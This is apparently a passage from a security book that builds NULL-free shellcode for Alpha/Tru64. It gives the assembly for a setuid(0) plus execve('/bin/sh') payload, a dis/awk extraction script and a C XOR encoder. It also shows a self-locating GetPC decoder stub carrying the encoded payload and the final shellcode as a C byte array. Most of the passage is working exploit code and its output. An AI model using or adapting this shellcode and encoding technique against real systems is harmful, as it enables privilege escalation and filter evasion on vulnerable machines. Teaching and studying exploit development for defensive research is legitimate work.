Assembling working shellcode with the XOR decoder takes several steps. In this section, we present a bare-bones setuid(0) + execve("/bin/sh", ...) shellcode written in assembly and then glue it into the XOR decoder described previously. Along the way, we present a couple of C programs and shell scripts that make the development process faster and more efficient. After writing the shellcode, we assemble and link it into an executable. This executable contains only the simple initial shellcode, without the XOR decoder and the GetPC self-locating code. First, we extract the main portion of the executable (the shellcode) and use a C program to go over the opcode bytes and XOR them with the XOR key, thus generating the encoded shellcode. Next, we plug the encoded shellcode into the GetPC and XOR decoder routine. The result is our final, encoded, self-locating, and self-decoding shellcode. Let's walk through the steps and develop the code.
Here we have the code for the setuid(0) and execve(/bin/sh) system calls (the code is fairly self-explanatory).
#include <alpha/regdef.h>
#include <alpha/pal.h>
.text
.arch generic
.align 4
.globl main
.ent main
main:
.frame $sp, 0,
                        #always assume that current location is in a0
                        #it is the responsibility of the decoder to pass
                        #the current Program Counter to us.
bic sp, 0xf, sp         #make sure the stack is 16 byte aligned.
addq a0, 0x30, s4       #address of //bin/sh
stq s4, (sp)            #store address of //bin/sh
stq zero, 8(sp)         #store the NULL terminator.
bis zero, zero, a0      #uid=0, first argument.
addq zero, 0x17, v0     #setuid syscall.
PAL_callsys             #trap to kernel.
mov s4, a0              #address of //bin/sh
mov sp, a1              #address that points to (address of //bin/sh).
bis zero, zero, a2      #NULL.
addq zero, 0x3b, v0     #execve syscall
PAL_callsys             #trap to kernel.
.quad 0x68732f6e69622f2f    #//bin/sh
.long 0x00000000            #NULL terminator of the string.
.end main
Compiling is pretty straightforward; use this command:
cc -O0 -o setuid_exec setuid_exec.s
Extraction can be a little tricky, but there is an easy solution: the dis (disassemble) command that ships with the Tru64 OS by default. Put the following lines into a shell script, which we named dump.sh:
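cat > dump.sh << '_EOF_'
# $1 is the executable to dump. The awk field number ($2) is an assumption
# about which column of the dis output holds the opcode; adjust it if needed.
dis -p main $1 | awk '{ print "0x"$2"," }'
_EOF_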
With the help of the dis and awk commands, we extract the main function (which we wrote by hand in the first step) as an array of longs. Here is what it looks like:

chmod 755 dump.sh
./dump.sh ./setuid_exec
[ignore the empty lines with only one comma]
,
0x47c1f11e,
0x4206140d,
0xb5be0000,
0x43e2f400,
0xb7fe0008,
0x47ff0410,
0x00000083,
0x47de0411,
0x45ad0410,
0x47ff0412,
0x43e77400,
0x00000083,
0x69622f2f,
0x68732f6e,
0x00000000,
You can perform the encoding step with simple C code (or Python, Perl, or whatever you wish). We place the extracted opcodes into an integer array, iterate through it, and XOR each value with the XOR key. The program finishes by dumping an XOR-encoded payload that is ready to be glued into the XOR decoder and the GetPC code.
#include <stdio.h>

unsigned int shellcode[] = {
    0x47c1f11e, 0x4206140d, 0xb5be0000, 0x43e2f400,
    0xb7fe0008, 0x47ff0410, 0x00000083, 0x47de0411,
    0x45ad0410, 0x47ff0412, 0x43e77400, 0x00000083,
    0x69622f2f, 0x68732f6e, 0x00000000
};

int main()
{
    int i;

    //printf("sizeof shellcode %d\n", (int)sizeof(shellcode));
    /* XOR every 32-bit word with the key and print it as a .long directive. */
    for (i = 0; i < (int)(sizeof(shellcode) / sizeof(shellcode[0])); i++)
        printf(".long\t0x%.8x\n", shellcode[i] ^= 0x88888888);
    return 0;
}
The output will be plugged back into an assembly program. Here is how the setuid+execve code will look with 0x88888888 as the XOR key.
.long 0xcf497996
.long 0xca8e9c85
.long 0x3d368888
.long 0xcb6a7c88
.long 0x3f768880
.long 0xcf778c98
.long 0x8888880b
.long 0xcf568c99
.long 0xcd258c98
.long 0xcf778c9a
.long 0xcb6ffc88
.long 0x8888880b
.long 0xe1eaa7a7
.long 0xe0fba7e6
.long 0x88888888
Note: Notice that the encoded payload contains no NULL bytes.
We will now glue the decoder and the encoded payload together by changing some configurable values in the XOR decoder.
#include <alpha/regdef.h>
#include <alpha/pal.h>
.text
.arch generic
.align 4
.globl main
.ent main
main:
.frame $sp, 0,
lda a0, -1000(sp)       #GetPC code we have just covered.
back:
bis zero, 0x86, a1      #a1 equals 0x00000086, which is the imb
                        #instruction that syncs the instruction cache, thus
                        #making it coherent with main memory.
                        #1st run: store imb instruction in sp - 1000 stack.
stl a1, -4(a0)          #2nd run: overwrite the following bsr instruction
                        #with imb.
addq a0, 48, a2
stl a1, -4(a2)          #also overwrite the 0x41414141 with the imb
                        #instruction, thus avoiding i-cache incoherency
                        #after the decode process. since the imb instruction
                        #also has NULL bytes, this is the only way to avoid
                        #NULL bytes in the decoder loop.
bsr a0, back            #branch to the label back, saving pc in a0 register.
                        #on the second run bsr will be overwritten.
                        #execution will continue with the next instruction.
addq a0, 52, a4         #offset to xored data plus four.
addq zero, 60, a3       #size of xored data in bytes.
                        #Changed according to the size of the setuid+execve payload
addq a0, 112, a5        #offset to xor key; equals xordata size plus 52.
addq a0, 48, a0         #a0 should point to the first instruction of the
                        #xored data.
ldl a1, -4(a5)          #load the xor key.
xorloop:
ldl a2, -4(a4)          #load a single long from the xored data.
xor a2, a1, a2          #xor/decrypt the long.
stl a2, -4(a4)          #store the long back into its location.
subq a3, 4, a3          #decrement counter.
addq a4, 4, a4          #increment xored data pointer, move to next long.
bne a3, xorloop         #branch back to xorloop till counter is zero.
.long 0x41414141        #this long will be overwritten with the imb
                        #instruction. flush I-cache.
.long 0xcf497996
.long 0xca8e9c85
.long 0x3d368888
.long 0xcb6a7c88
.long 0x3f768880
.long 0xcf778c98
.long 0x8888880b
.long 0xcf568c99
.long 0xcd258c98
.long 0xcf778c9a
.long 0xcb6ffc88
.long 0x8888880b
.long 0xe1eaa7a7
.long 0xe0fba7e6
.long 0x88888888
.long 0x88888888        #XOR key.
.end main
As the final step, we compile the assembly code and extract the main function's opcodes to obtain our final shellcode.

cc -O0 -o final_setuid_exec final_setuid_exec.s
./dump.sh final_setuid_exec
,
0x221efc18,
0x42061412,
0x47f0d411,
0xb230fffc,
...
Once again, our shell script prints out an array of integers, which is our final shellcode. We can produce better-looking output (a C char-style array) by using the following basic C code.
#include <stdio.h>
#include <string.h>

unsigned int shellcode[] = {
    0x221efc18, 0x42061412, 0x47f0d411, 0xb230fffc,
    0xb232fffc, 0xd21ffffb, 0x420e1415, 0x42069414,
    0x43e79413, 0xa235fffc, 0x42061410, 0xa254fffc,
    0x42609533, 0x46510812, 0xb254fffc, 0x42809414,
    0xf67ffffa, 0x41414141, 0xcf497996, 0xca8e9c85,
    0x3d368888, 0xcb6a7c88, 0x3f768880, 0xcf778c98,
    0x8888880b, 0xcf568c99, 0xcd258c98, 0xcf778c9a,
    0xcb6ffc88, 0x8888880b, 0xe1eaa7a7, 0xe0fba7e6,
    0x88888888, 0x88888888
};

int main()
{
    unsigned char buf[sizeof(shellcode) + 1];
    int i;

    printf("sizeof shellcode %d\n", (int)sizeof(shellcode));
    /* Copy the words as raw bytes; the byte order follows the host
       (little-endian on Alpha). */
    memcpy(buf, shellcode, sizeof(shellcode));
    for (i = 0; i < (int)sizeof(shellcode); i++) {
        if (!(i % 4))
            printf("\"");           /* open a quoted string every four bytes */
        printf("\\x%.2x", buf[i]);
        if ((i % 4) == 3)
            printf("\"\n");         /* close it after the fourth byte */
    }
    return 0;
}
The output of the memcpy-based program will be the familiar exploit character array.

"\x18\xfc\x1e\x22"
"\x12\x14\x06\x42"
"\x11\xd4\xf0\x47"
"\xfc\xff\x30\xb2"
"\xfc\xff\x32\xb2"
...
Now, let's move on to more advanced concepts and build several new shellcodes. From now on, only the initial assembly shellcode and the final C code will be presented. All the intermediate development steps described above will be left out to save space.